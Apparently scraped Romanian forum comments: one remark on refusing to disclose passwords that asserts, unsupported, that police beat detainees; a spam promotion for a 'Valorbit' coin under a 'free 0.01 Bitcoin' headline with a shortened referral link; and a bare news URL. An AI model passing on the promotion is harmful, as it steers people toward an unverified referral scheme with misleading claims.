Orice lege ar exista ,nu o sa te poata obliga vreodata cineva "sa nu uiti " . E simplu , raspunsul tau este "am uitat parola " . Practic insa , lucrurile stau cu totul altfel . Daca vor sa afle neaparat ceva de la tine te bat(la propriu) de te pisi pe tine zile intregi ,chiar saptamani daca e nevoie si vor spune ca ti-ai facut singur ranile ,in camera de arest .Imi asum ceea ce afirm , nu sunt povesti .

Gratis 0.01 Bitcoin Valorbit este o moneda noua care se castiga prin promovare, prin invitatii.La intregistrare primiti 10000 VALPentru share pe facebook, twitter si linkedin primiti inca 1000 VAL pentru fiecare in parte.Deocamdata nu exista exchange dar se lucreaza. apare pe c-cex maineMoneda se poate si mina.Are atat wallet in browser cat si pentru windows.Va recomand sa va faceti cont direct cu facebook-ul, primiti mai multe monede. daca este verificat cu numar de telefon http :// bit. ly/ 1oiFtrl

http://fossbytes.com/muslims-support-terrorism-as-suggested-by-google/